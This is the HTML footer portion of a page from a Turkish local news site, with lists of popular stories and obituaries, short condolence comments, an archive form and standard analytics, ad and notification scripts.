saldırı: 1#039;i..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/pompali_tufekli_saldiri_1_i_agir_2_yarali_h67445_ee2af.jpg" alt="Pompalı tüfekli saldırı: 1#039;i..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/pompali-tufekli-saldiri-1-i-agir-2-yarali-h67445.html" title="" ><span class="en-hit">2.</span> <strong>Pompalı tüfekli saldırı: 1&#039;i...</strong> <span class="en-spot en-hidden">Elbistan&#039;da bir araçtaki 2 şahıs, kimliği belirsiz kişiler tarafından...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-ay-cekirdegi-hasadi-buruk-basladi-h67474.html" title="Elbistanda ay çekirdeği hasadı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/elbistanda_ay_cekirdegi_hasadi_buruk_basladi_h67474_0f447.jpg" alt="Elbistanda ay çekirdeği hasadı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-ay-cekirdegi-hasadi-buruk-basladi-h67474.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan’da ay çekirdeği hasadı...</strong> <span class="en-spot en-hidden">Elbistan’da binlerce dönüm alanda ekimi yapılan yerli çerezlik ay...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sefa-sakalar-33-yasinda-h67454.html" title="Sefa Şakalar 33 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/sefa_sakalar_33_yasinda_h67454_d6dbb.jpg" alt="Sefa Şakalar 33 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sefa-sakalar-33-yasinda-h67454.html" title="" ><span class="en-hit">4.</span> <strong>Sefa Şakalar 33 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fadime-tekebaba-42-yasinda-h67488.html" title="Fadime Tekebaba 42 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/fadime_tekebaba_42_yasinda_h67488_a2776.jpg" alt="Fadime Tekebaba 42 yaşında," ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fadime-tekebaba-42-yasinda-h67488.html" title="" ><span class="en-hit">5.</span> <strong>Fadime Tekebaba 42 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/kadir-karaoglan-57-yasinda-h67706.html" title="Kadir Karaoğlan 57 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/kadir_karaoglan_57_yasinda_h67706_e597a.png" alt="Kadir Karaoğlan 57 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/kadir-karaoglan-57-yasinda-h67706.html" title="" ><span class="en-hit">1.</span> <strong>Kadir Karaoğlan 57 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-karalar-60-yasinda-h67671.html" title="Ahmet Karalar 60 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/ahmet_karalar_60_yasinda_h67671_a97a5.jpg" alt="Ahmet Karalar 60 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-karalar-60-yasinda-h67671.html" title="" ><span class="en-hit">2.</span> <strong>Ahmet Karalar 60 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sule-yuzbasi-62-yasinda-h67489.html" title="Şule Yüzbaşı 62 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/sule_yuzbasi_62_yasinda_h67489_eb43f.jpg" alt="Şule Yüzbaşı 62 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sule-yuzbasi-62-yasinda-h67489.html" title="" ><span class="en-hit">3.</span> <strong>Şule Yüzbaşı 62 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/celal-kaya-70-yasinda-h67631.html" title="Celal Kaya 70 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/celal_kaya_70_yasinda_h67631_4fb34.jpg" alt="Celal Kaya 70 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/celal-kaya-70-yasinda-h67631.html" title="" ><span class="en-hit">4.</span> <strong>Celal Kaya 70 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fatma-bucak-30-yasinda-h67622.html" title="Fatma Bucak 30 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/09/fatma_bucak_30_yasinda_h67622_8c7fe.jpg" alt="Fatma Bucak 30 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fatma-bucak-30-yasinda-h67622.html" title="" ><span class="en-hit">5.</span> <strong>Fatma Bucak 30 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317303" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html#comment_317302" title="" >Kediyi eve bile hapsedemezsiniz,özgürlüğüne...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317301" title="" >Merhum abimize Rabbimden rahmet acılı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/ilkogretim-haftasi-kutlaniyor-h67747.html#comment_317300" title="" >Ne ayak? Bu tabiri kullanarak İlköğretim...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/saime-kizilkaya-80-yasinda-h67702.html#comment_317298" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fidan-elmas-76-yasinda-h67704.html#comment_317297" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kadir-karaoglan-57-yasinda-h67706.html#comment_317296" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317295" title="" >ALLAH RAHMET EYLESİN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kerim-kisaca-h67751.html#comment_317294" title="" >Hocam Allah rahmet eylesin mekanın cennet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317293" title="" >Allah rahmet eylete mekani cennet ola yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html#comment_317292" title="" >Kedi parkı Elbistan sokaklar yakında kesi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-dogan-79-yasinda-h67745.html#comment_317291" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-terkivatan-81-yasinda-h67750.html#comment_317290" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/makbule-sakalar-80-yasinda-h67752.html#comment_317288" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-hicazlioglu-seyar-81-yasinda-h67753.html#comment_317286" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317285" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/meyse-olker-61-yasinda-h67741.html#comment_317284" title="" >ALLAH CC rahmet eylesin,yakınlarına başsağlığı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317283" title="" >Allah rahmet eylesin,mekanı cennet olur...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kerim-kisaca-h67751.html#comment_317282" title="" >Kerim hocam çok değerli bir zat elbistanın...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-koleli-88-yasinda-h67754.html#comment_317281" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" selected>15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" selected>Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="TDP ekipleri esnaflara 14 kural broşürü dağıttı" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> elbistaninsesigazetesi@gmail.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Ftdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('67760', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 